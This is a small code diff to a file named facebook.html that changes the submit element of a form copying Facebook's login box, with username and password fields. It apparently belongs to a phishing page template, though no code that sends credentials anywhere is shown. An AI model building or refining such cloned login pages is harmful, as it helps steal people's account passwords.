--- a/templates/facebook.html
+++ b/templates/facebook.html
@@ -100,7 +100,7 @@ body {
     <div class="login-box">
       <input type="text" id="username" name="username" placeholder="Mobile number or email" required />
       <input type="password" id="password" name="password" placeholder="Password" required />
-      <button type="submit" class="login-btn">Log In</button>
+      <input type="submit" class="login-btn" value="Log In">
       <a href="#" class="forgot">Forgotten password?</a>
       <div class="divider"></div>
       <button class="create-btn">Create New Account</button>
